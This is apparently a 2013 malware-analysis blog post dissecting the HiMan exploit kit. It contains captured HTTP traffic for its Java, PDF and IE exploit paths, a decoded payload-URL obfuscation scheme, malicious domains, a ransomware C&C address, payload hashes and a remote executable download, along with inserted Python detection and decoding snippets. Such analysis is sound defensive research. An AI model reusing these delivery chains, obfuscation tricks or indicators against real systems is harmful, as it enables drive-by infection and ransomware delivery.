2013-10-02 - Study
HiMan Exploit Kit. Say Hi to one more.
For the Thumbnail |
Yes, it's another Exploit Kit. Good news (only because it should be less boring): there are more than two jars in this one.
Thanks to Eoin Miller for the inputs that allowed me to write this post.
from Eoin |
So HiMan is not the real name of this Exploit Kit. It seems to be High Load, but as HighLoad is a reputable security conference held in Russia we won't use that name. (For the same kind of reason, we now refer to what we previously called PopAds as Magnitude.)
HiMan EK login Screen - "Power by High Load, 2013" |
I haven't heard of any public advert for this Exploit Kit, but ping me if there is one and you know where :)
What is tricky with this one is that there seems to be a whitelist filter on the referer.
Wrong referer : bye ! (obviously wrong country, wrong browser, known IP... same way).
HiMan driving you out. Landing > jsdetect > windows.location = out. |
(I don't know why it's not done directly on the landing... are all the stats-related functions in index?)
The POST to index.php contains the upper referer.
Post to index with Correct Referer and Fresh IP. |
To study this, it helps to know which pierced armor we must show HiMan to get all the bullets :
Conditions allow you to guess what will hit you, except maybe for IE |
CVE-2011-3544 : Java2
(because CVE-2013-2465 crashes older versions of JRE 6)
GET http://fifallllolka .info/xuguczel.php
200 OK (text/html)
GET http://fifallllolka .info/js/jquery.js
200 OK (application/javascript)
POST http://fifallllolka .info/index.php
200 OK (text/html)
java2 in HiMan 2013-10-02 |
We can easily see this in the noise. |
GET http://fifallllolka .info/xufomav/b.jar
200 OK (application/java-archive) 378b01a6c3969089d0779aeb80185627
GET http://fifallllolka .info/com.class 404 Not Found (text/html)
GET http://fifallllolka .info/edu.class 404 Not Found (text/html)
GET http://fifallllolka .info/net.class 404 Not Found (text/html)
GET http://fifallllolka .info/org.class 404 Not Found (text/html)
GET http://fifallllolka .info/com.class 404 Not Found (text/html)
GET http://fifallllolka .info/edu.class 404 Not Found (text/html)
GET http://fifallllolka .info/net.class 404 Not Found (text/html)
GET http://fifallllolka .info/org.class 404 Not Found (text/html)
Getting System Properties for Stats Purposes Piece of dwq.class in b.jar - HiMan 2013-10-02 |
GET http://fifallllolka .info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16
200 OK (application/octet-stream)
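The kds.php request above (and the later ones under Java1 and java3) carries the stats the applet collected: an exploit tag (ex=), the OS and the JRE version. As an added example, not code from the post, this Python scanner runs over a constructed proxy log modelled on the captures and flags two HiMan traits seen here: the four root-package .class lookups answered with 404, and the kds.php payload requests with their parameters.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log, one "METHOD URL STATUS" per line, modelled on the
# Fiddler captures in the post (the defanging spaces before ".info" removed).
SAMPLE_LOG = """\
GET http://fifallllolka.info/xufomav/b.jar 200
GET http://fifallllolka.info/com.class 404
GET http://fifallllolka.info/edu.class 404
GET http://fifallllolka.info/net.class 404
GET http://fifallllolka.info/org.class 404
GET http://fifallllolka.info/xufomav/kds.php?ex=rhi&name=BOBOB&country=US&os=Windows+XP&ver=1.6.0_16 200
GET http://fifallllllolka.info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45 200
GET http://cdn.example/js/jquery.js 200
"""

LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
ROOT_CLASSES = {"com.class", "edu.class", "net.class", "org.class"}


def scan_log(text):
    """Return (hosts showing all four .class 404 probes, kds.php requests).

    Each kds.php entry keeps the stats parameters the post points at:
    ex (exploit tag), os and ver (JRE version), plus the serving host.
    """
    class_probes = defaultdict(set)
    payloads = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip anything that is not in the expected log shape
        u = urlsplit(m["url"])
        name = u.path.rsplit("/", 1)[-1]
        if m["status"] == "404" and name in ROOT_CLASSES:
            class_probes[u.hostname].add(name)
        elif name == "kds.php":
            q = {k: v[0] for k, v in parse_qs(u.query).items()}
            payloads.append({"host": u.hostname, "ex": q.get("ex"),
                             "os": q.get("os"), "ver": q.get("ver")})
    probed = sorted(h for h, seen in class_probes.items() if seen == ROOT_CLASSES)
    return probed, payloads


if __name__ == "__main__":
    hosts, fetches = scan_log(SAMPLE_LOG)
    print("class-probe hosts:", hosts)
    for f in fetches:
        print("payload fetch:", f)
```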
Payload is a zip
a.jar function to deal with the Zip payload (didn't spend time on it) |
containing Flimrans Ransomware :
Flimrans these days. As often with affiliates, it's the same icon across every infection vector : built / packed at the same place |
-----------Out of topic : Payload-----------
Flimrans : 9eb1f89a74e708c27869eadb0b421ca6
(A ransomware that seems to have first been pushed in Flimkit (as a dedicated family) in the middle of May 2013. This was the same kind of pairing as Kore with Urausy/FakeAV.
I will make a post about it really soon <Done : it's here />. It's starting to be widely spread.)
C&C :
95.211.239.222
16265 | 95.211.0.0/16 | LEASEWEB | NL | LEASEWEB.COM | LEASEWEB B.V.
GET /IccpytZxrc79KfIjQojAavSfYfhOBm4= HTTP/1.1
Host: utipiguty.de
Cache-Control: no-cache
--------------------------------------------
CVE-2013-2465 : Java1
HiMan CVE-2013-2465 Successful path 2013-10-01 |
GET http://fifallllllolka .info/sacixudy.php
200 OK (text/html)
GET http://fifallllllolka .info/js/jquery.js
200 OK (application/javascript)
POST http://fifallllllolka .info/index.php
200 OK (text/html)
java1() in HiMan 2013-10-02 |
GET http://fifallllllolka .info/sivajup/a.jar 4c1aabd2f558c453555da5ff7a7559de
200 OK (application/java-archive)
Piece of CVE-2013-2465 in a.jar |
GET http://fifallllllolka .info/sivajup/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+7&ver=1.6.0_45
200 OK (application/octet-stream)
CVE-2013-2465 with embedded jnlp (to avoid Security Warning): java3
I'll fly over that one.
CVE-2013-2465 with embedded jnlp pass (the js size 0 is an artifact - cached) |
GET http://fifalllolka .info/xalbigki.php
200 OK (text/html)
GET http://fifalllolka .info/js/jquery.js
304 Not Modified () (artifact - cached here)
POST http://fifalllolka .info/index.php
200 OK (text/html)
java3 in HiMan 2013-10-02 |
200 OK (application/java-archive)
GET http://fifalllolka .info/jumyvvu/kds.php?ex=jre&name=BOBOB&country=US&os=Windows+XP&ver=1.7.0_11
200 OK (application/octet-stream)
CVE-2010-0188 :
It's an assumption that it's libtiff, as there is an embedded file. I didn't spend enough time on it; Wepawet and VirusTotal were helpless here.
CVE-2010-0188 Successful pass in HiMan 2013-10-02 |
200 OK (text/html)
GET http://aakrinopidarasti .info/js/jquery.js
200 OK (application/javascript)
POST http://aakrinopidarasti .info/index.php
200 OK (text/html)
GET http://aakrinopidarasti .info/gadgepu/d.php?h=h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11.11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611c11o11u11n11t11r11y11%3D11U11S11
200 OK (application/pdf)
HiMan's PDF in PDFStreamDumper. |
The object after some light deobfuscation (mainly replacing "hello prettylame iwnzzz" by %) |
After the eval |
[Have to stop here for now - will dig into it to find out why there are 2 payload calls]
<edit1 2013-10-03>
GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US
200 OK (application/octet-stream) (same Flimrans)
GET http://aakrinopidarasti .info/gadgepu/kds.php?ex=ad&name=BOBOB&country=US;1
200 OK (application/octet-stream)
@kafeine I think the payload is the same, but depending on the Adobe reader version the exploit bytes change. hvkhhttgc will be shellcode..
— Jose Miguel Esparza (@EternalTodo) October 3, 2013
@kafeine Shellcode using XOR to decode itself, URLDownloadToCacheFileW to download and CreateProcess to execute it.</edit1>
— Jose Miguel Esparza (@EternalTodo) October 26, 2013
CVE-2013-2551 : (working here....)
Discovered by Vupen and exploited at Pwn2Own 2013
CVE-2013-2551 in HiMan - 2013-10-01 |
GET http://akrinopidarasti .info/wywetukr.php
200 OK (text/html)
GET http://akrinopidarasti .info/js/jquery.js
200 OK (application/javascript)
POST http://akrinopidarasti .info/index.php
200 OK (text/html)
IE Check Before Firing (note : on another pass) |
Cleaning to see a little better (note : it's another pass, so the pattern does not match this one) |
GET http://akrinopidarasti .info/qywurro/sh.php?i=h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79.79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679c79o79u79n79t79r79y79%3D79U79S79
200 OK (text/html)
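The sh.php?i= value above, like the d.php?h= value in the CVE-2010-0188 pass, is the percent-encoded payload URL with the same two-digit filler ("79" here, "11" there) inserted after every character or %XX escape. As an added example that is not code from the post, this Python decoder infers the filler from the first token, walks the value token by token and recovers the kds.php URL from both captured parameters; anything that does not fit the pattern raises, which is what makes it usable as a detection check on proxy logs.

```python
import re
from urllib.parse import unquote

# The two parameter values copied from the captured requests in the post
# (d.php?h=... on aakrinopidarasti and sh.php?i=... on akrinopidarasti).
SAMPLE_H = ("h11t11t11p11%3A11%2F11%2F11a11a11k11r11i11n11o11p11i11d11a11r11a11s11t11i11"
            ".11i11n11f11o11%2F11g11a11d11g11e11p11u11%2F11k11d11s11.11p11h11p11%3F11"
            "e11x11%3D11a11d11%2611n11a11m11e11%3D11B11O11B11O11B11%2611"
            "c11o11u11n11t11r11y11%3D11U11S11")
SAMPLE_I = ("h79t79t79p79%3A79%2F79%2F79a79k79r79i79n79o79p79i79d79a79r79a79s79t79i79"
            ".79i79n79f79o79%2F79q79y79w79u79r79r79o79%2F79k79d79s79.79p79h79p79%3F79"
            "e79x79%3D79a79d79%2679n79a79m79e79%3D79B79O79B79O79B79%2679"
            "c79o79u79n79t79r79y79%3D79U79S79")


def decode_himan_param(value):
    """Strip the per-token filler and percent-decode what remains.

    A token is one literal character or a %XX escape. The filler is read
    from the two digits after the first token and must follow every later
    token as well, so a value that was not encoded this way raises.
    """
    tokens, sep, i = [], None, 0
    while i < len(value):
        tok = value[i:i + 3] if value[i] == "%" else value[i]
        if tok.startswith("%") and not re.fullmatch(r"%[0-9A-Fa-f]{2}", tok):
            raise ValueError(f"malformed escape at offset {i}")
        i += len(tok)
        if sep is None:
            sep = value[i:i + 2]
            if not re.fullmatch(r"[0-9]{2}", sep):
                raise ValueError("no two-digit filler after first token")
        if value[i:i + 2] != sep:
            raise ValueError(f"expected filler {sep!r} at offset {i}")
        i += 2
        tokens.append(tok)
    return unquote("".join(tokens))


def is_himan_encoded(value):
    """True when the value decodes cleanly under the scheme above."""
    try:
        decode_himan_param(value)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(decode_himan_param(SAMPLE_H))
    print(decode_himan_param(SAMPLE_I))
```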
Piece of CVE-2013-2551 |
GET http://37.200.65.58/222.exe
200 OK (application/octet-stream)
92c2ad1ca04e431100313b9468842c0d Content-Length: 1536
VT TimeStamp |
What happens once "infected" ?
CVE-2013-2551 Payload |
Exploitation Graph :
<edit1 2013-12-02>
CVE-2013-0634 is inside. See :
CVE-2013-0634 (Flash) is in HiMan EK. Post Updated : http://t.co/lKbEWTabh1 Thanks Eoin Miller for inputs. pic.twitter.com/WS51ypkWiJ
— kafeine (@kafeine) December 2, 2013
CVE-2013-0634 (Adobe Flash Player) integrating Exploit Kits </edit1>
<edit2 2013-12-12>
HiMan EK "Sploit" folder is now randomized and rotating.
Double pass in HiMan EK 2013-12-12 |
Files :
4 fiddlers and payloads (Owncloud via goo.gl)